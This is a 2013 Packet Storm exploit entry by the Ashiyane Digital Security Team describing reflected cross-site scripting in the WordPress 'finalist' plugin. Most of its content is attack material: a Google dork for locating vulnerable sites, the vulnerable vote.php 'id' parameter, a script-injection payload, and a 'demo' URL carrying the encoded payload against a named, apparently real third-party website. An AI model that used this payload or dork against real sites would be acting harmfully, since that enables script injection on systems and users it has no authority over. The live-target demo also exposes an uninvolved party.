WordPress Finalist Cross Site Scripting

2013-10-14T00:00:00
ID PACKETSTORM:123597
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-10-14T00:00:00

Description

                                        
                                            `#######################################################################  
# Exploit Title : Wordpress finalist Plugin Cross site scripting  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Google Dork : inurl:wp-content/plugins/finalist  
#  
# Software Link : www.wordpress.org  
#  
# Tested on: Windows , Linux  
#  
# Date: 2013/10/14  
#  
#############################################  
# Exploit : Cross site scripting  
#  
# Location1:  
[Target]/wp-content/plugins/finalist/vote.php?id=[xss]  
#  
#  
# Script For Test : "/><script>alert(1);</script>  
#  
##########################################  
# Demo   
#http://www.thefaceshop.com.sg/wp-content/plugins/finalist/vote.php?id=113%22/%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E  
##############  
#  
# Milad Hacking  
#  
# We Love Mohammad  
#  
##############  
`